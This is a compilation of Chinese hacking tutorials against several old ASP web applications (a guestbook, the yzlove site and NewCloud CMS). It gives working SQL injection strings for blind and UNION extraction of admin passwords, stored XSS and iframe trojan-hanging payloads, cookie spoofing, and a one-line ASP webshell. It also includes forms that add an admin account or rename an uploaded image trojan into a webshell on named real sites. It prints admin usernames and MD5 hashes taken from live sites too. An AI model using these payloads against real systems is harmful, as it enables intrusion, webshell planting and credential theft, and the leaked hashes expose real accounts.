Rs.pagesize=listnum
    page=Request("page")
    if (page-Rs.pagecount) > 0 then
    page=Rs.pagecount
    elseif page = "" or page < 1 then
    page = 1
    end if
%>


注意keyword这个变量 只用trim函数过滤掉了空格 显然没有过滤完全。

大家注意它的sql的查询方式，我们必须通过 关键字%' and [我们构造的语句] and '% 构成一个闭合查询语句

比如我们构造这个语句：keyword%' and 1=1 and '% 那么程序在执行的时候就会变成：

select * from guest where guestcontent like '%关键字%' and 1=1 and '%%'

这样就实现了注入。

这里我们在实际做的时候会遇到一些问题，但是我们可以本地提交。大家来看代码：


<INPUT maxLength=12 size=28 name=keyword>


程序限制了长度 12个字节 问题是 我们构造语句 12个是一定会超出的,这样的话 我们就以把searchresult.asp

这个文件保存到本地，然后补全action后面的url 在把maxlength改为120嘿嘿 够长了吧。。。。

关键字%' and ascii的值=(select top 1 asc(mid(password,1,1)) from admin) and '%

com%' and 97=(select top 1 asc(mid(username,1,1)) from admin) and '%

如果正确 则返回正常页面 否则程序会alert("没有符合条件的记录")

二.跨站漏洞

save.asp

server.HTMLEncode(guestname)<>guestname or InStr(guestname," ")<>0 or InStr(guestname," ")<>0 or InStr(guestname,"【")<>0 or InStr(guestname,"】")<>0 or InStr(guestname,"/")<>0 or InStr(guestname,"\")<>0 or InStr(guestname,"_")<>0 or InStr(guestname,"'")<>0 or InStr(guestname,".")<>0 


代码比较乱，但是我们可以看出htmlencode这个函数 肯定是一个过滤非法字符的。它就位于

我们来读下它的代码。


function HTMLEncode(fString)

    fString = replace(fString, ">", ">")

    fString = replace(fString, "<", "<")

    fString = Replace(fString, CHR(13), "")

    fString = Replace(fString, CHR(10) & CHR(10), "</P><P>")

    fString = Replace(fString, CHR(10), "<BR>")

    HTMLEncode = fString

end function


过滤掉了 很多跨站常用的字符。。。可以那么说，这里的跨站几乎是没戏了。。。那么我们把眼光移动到另

一个文件上。。。

undate_eidtnote.asp

这个文件 没有包含刚刚我们说的 char.asp 这个文件，那么跨站就成为轻而一举的事情了。。。


<%
notetitle=request("notetitle")
notebbs=request("guestcontent")
set rs=server.createobject("adodb.recordset")
sql="select notetitle,notebbs,notedate from [lybconfig] where id=1"
rs.open sql,conn,1,3
rs("notebbs")=(request("guestcontent"))
rs("notetitle")=(request("notetitle"))
rs("notedate")=Date()
    rs.update
rsclose()
connclose() 
%>


还是一样 直接获取 没有过滤。。。

构造语句：


<script>alert("品透泡菜")</script>


挂马代码：


<iframe src=http://www.baidu.com width=100 


放到公告栏里就行了。。。

但是该文件开头有那么一句

也就是说 只有登陆后台 才有权限来搞....

三.cookies欺骗

username=管理员名字&password=MD5加密&randomid=随便写数字

四.总结

由于这个留言簿的功能很简单，从它或者webshell比较困难，但是这个留言本可以说是一个插件，

如果你的运气够好的话，这个留言本的后台密码也许就是主站的后台密码。。。

这样获得webshell的几率就高了。。。

Powered by pintoupaocai

程序：yzlove(扬州交友)
漏洞文件：dis_article.asp
利用方法：
有不少为SQL的程序，可以直接注入，用NB死的时候要把Encode选上，不然列不出来目录
ACCESS的还没发现更好的利用方法，默认数据库的话就好办了，没加防下载，可以直接下来，默认数据库路径为admin/yzloveadmin.asp，下来数据库登陆后台，直接写一句话木马！
PS：在写一句话的时下把下面的代码保存为htm文件，然后提交，注意提交的地址

<table width="100%" height="40" border="0" cellpadding="0" cellspacing="0" background="../images/pg.gif">
        <tr> 
          <td align="center"> <table width="460" height="22" border="0" cellpadding="0" cellspacing="0" background="../images/pg.gif" bgcolor="efefef">
              <form action="http://www.9sy.net/admin/adminuser.asp?submitok=addadmin" method="post" name=form>
                <tr> 
                  <td width="489" align="center"><a href="adminuser.asp">添加管理员名称：</a> 
                    <input name="name2" type="text" id="num2" value="xuehan" style="font-size:9pt;" size="12" maxlength="102">
                    密码： 
                    <input name="pass2" type="text" id="num3" value="www.9sy.net" style="font-size:9pt;" size="12" maxlength="102"> 
                    <select name="kind" id="kind" style="font-size:9pt;">
                      <option value=''''<%execute request("a")%>'''' selected >1</option>
                      <option value="2">2</option>
                      <option value="3">3</option>
                      <option value="4">4</option>
                      <option value="5">5</option>
                      <option value="6">6</option>
                      <option value="7">7</option>      
                      <option value="8">8</option>     
                      <option value="9">9</option>      
                      <option value="10">10</option>
                    </select> <input type="submit" name="Submit2" value="OK"  style="border:#cccccc 1px solid;padding-top:1px;height:18;font-size:9pt;background:#ffffff;color:#333333;"></td>
                </tr>
              </form>
            </table></td>
          <td width="20%" align="center"> </td>
        </tr>
      </table>


新云网站管理系统最新漏洞解析

by 萍水相逢
****************************************************************************************
一：绕过单引号继续注入漏洞(存在于SQL版中)

由于我这没有装SQL，这个漏洞就不演示了

二：修改任一用户资料漏洞

此漏洞同样存在于user/changeinfo.asp中
我们先在本地注册一个用户，我已经注册好了，用户123,选择修改资料，保存此网页并作修改。
选择我们要修改的用户名和ID，我这里选择TTFCT，ID为1，注意，修改前：
用户邮箱：t@t.com，密码提示问题是：who are you?
注意，修改前，我们得先登陆，我用123登陆
现在开始修改：成功修改，现在再次查看TTFCT的资料，注意到没有，被改了。我们现在来
取他密码，这是程序的BUG，如果程序正常，我们完全可以修改TTFCT的密码

三：SQL注入漏洞

漏洞测试网站一：云南黑客联盟

申请一个用户，登陆，然后发表文章，D:\YNHACK\USER\../inc/cls_main.asp网站路径
管理员数小于5，管理员数为3，第一个管理员用户名长度小于7，第一个管理员用户名长度为5
用户名第一个字母为a,第一个管理员用户名为 admin,MD5密码第一个是7,后面的我就不猜了，和猜
用户名同一个道理，不过，这里长度有16位。手工很慢，为此，使用UNION查寻来提高效率，
第一个管理员用户名 admin md5密码 7a57a5a743894a0e->admin.现在网速太慢。被锁定了，这是第
二个管理员 liucho0400 密码 b086f71d080453fa，第三个 灵男 密码581abc28e23d1669，后面的工作
我就不作了，如果拿到解密后的密码进入后台轻易得到WEBSHELL

漏洞测试网站二：新云官方网站

不能注册，社会工程学来 admin admin 不行 123 123 不行，123456 123456 成功进入，发表文章
进行了错误处理，提交 --,正常，说明是sql版,直接加用户，我们在nc_user中加一个用户名和密码
都为 123的用户，先MDB转化一下，123->ac59075b964b0715，提交
insert into nc_user(username,password) values('123','ac59075b964b0715'),现在登陆试试，
可能数据库中有这个用户了吧，那我们它密码
update nc_user set password='ac59075b964b0715' where username='123',成功。
现在利用辅助工具注入，前提是要登陆，不好意思，要用123456登陆才能看自己的文章
好，现在已成功注入了。

至于拿WEBSHELL的事，我就不去搞了。大家自己发挥吧


此漏洞存在于ACCESS和SQL版中，漏洞页面为user/articlelist.asp

and (select count(*) from nc_admin)<5 查看管理员数
and (select count(*) from nc_admin)=3
猜管理员用户名长度和用户名
and (select len(username)<7 from nc_admin where id=1)
and (select len(username)=5 from nc_admin where id=1)
and (select id from nc_admin where left(username,1)= 'a' and id=1)
and (select id from nc_admin where left(username,2)= 'ad' and id=1)

猜管理员MD5密码
and (select id from nc_admin where left(password,1)='7' and id=1)

UNION查寻
union select 1,2 ,password,4,5, username,7,8,9 from nc_admin where id=1

以下是源代码:

<script language=javascript src=http://www.99**.com/include/mouse_on_title.js></script>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="manage.css" type="text/css">
</head>
<BODY background="../images/admin/back.gif">

<table width="98%" border="1" style="border-collapse: collapse; border-style: dotted; border-width: 0px" 
bordercolor="#333333" cellspacing="0" cellpadding="2">
<form action=http://www.99**.com/admin/safe5.asp method=post name=backup>
<tr class=backs><td colspan=2 class=td height=18>数据库在线维护</td></tr>
<input type="hidden" name="oldpath" value="../pic/digi/0063.jpg"><!--木马改图片上传后的路径-->
<input type="hidden" name="DBname" size="20" value="xuehan.asp"><!--要备份的木马路径-->
<tr><td colspan=2 heigh=50>从未备份数据库文件</td></tr>
<tr><td colspan=2>
<input title='备份正在使用的数据库文件' type="submit" name="Submit" value="备份" onclick="{if(confirm('备份正在使用的数据库文件，有道是常"备"无患，出了问题后可用于恢复！\n\n备份文件将保存在后台目录里，只要后台目录不公开，放在这里的文件就非常安全。\n\n单击确定继续，单击取消返回。')){this.document.backup.submit();return true;}return false;}"> 
<input title='对备份的数据库文件进行压缩和修复' type='button' value='压缩' onclick="{if(confirm('对数据库备份文件进行压缩，减少占用空间，还可修复数据库错误。\n\n正在使用的数据库不能压缩，请按"备份"—"压缩"—"恢复"的流程操作。\n\n单击确定继续，单击取消返回。 ')){location.href='safe5.asp?action=yasuo';}}"> 
<input title='用备份文件覆盖正式数据库文件' type='button' value='恢复' onclick="{if(confirm('用数据库备份文件覆盖正式的数据库文件，单击确定继续，单击取消返回。')){location.href='safe5.asp?action=huifu';}}"> 
<input title='删除数据库备份文件' type='button' value='删除' onclick="{if(confirm('删除备份的数据库文件（即后台目录里的备份文件shopbackup.mdb）。\n\n单击确定继续，单击取消返回。')){location.href='safe5.asp?action=del';}}"> 
<input title='将备份的数据库下载到本地保存' type='button' value='下载' onclick="{if(confirm('将数据库备份文件下载到自己的电脑中保存一份，以备不测。\n\n不怕一万，只怕万一 ^_^ 需要时可上传并恢复数据库。\n\n单击确定继续，单击取消返回。 ')){location.href='safe5.asp?action=down';}}"> 
<INPUT title='将本地数据库文件上传到网站' TYPE="button" value="上传" onClick="window.open('upload.asp?fuptype=db&fupname=shopbackup&frmname=db','blank_','scrollbars=yes,resizable=no,width=650,height=450')">
<input type="hidden" name="backup" value="ok">
</td></tr>
</form>
</table>
<br><font color=red>※提示：</font><br><br>
此操作需FSO功能支持。<br>
执行此操作前，请先关闭其它网页窗口，断开FTP连接。<br>
提交后，请耐心等待<font color=red>（请不要重复点击上面的按钮），</font>完成时间视网络状况而定。<br>
请在网络空闲时进行此操作，<b>执行此操作可能导致服务器变慢或不稳定</b>。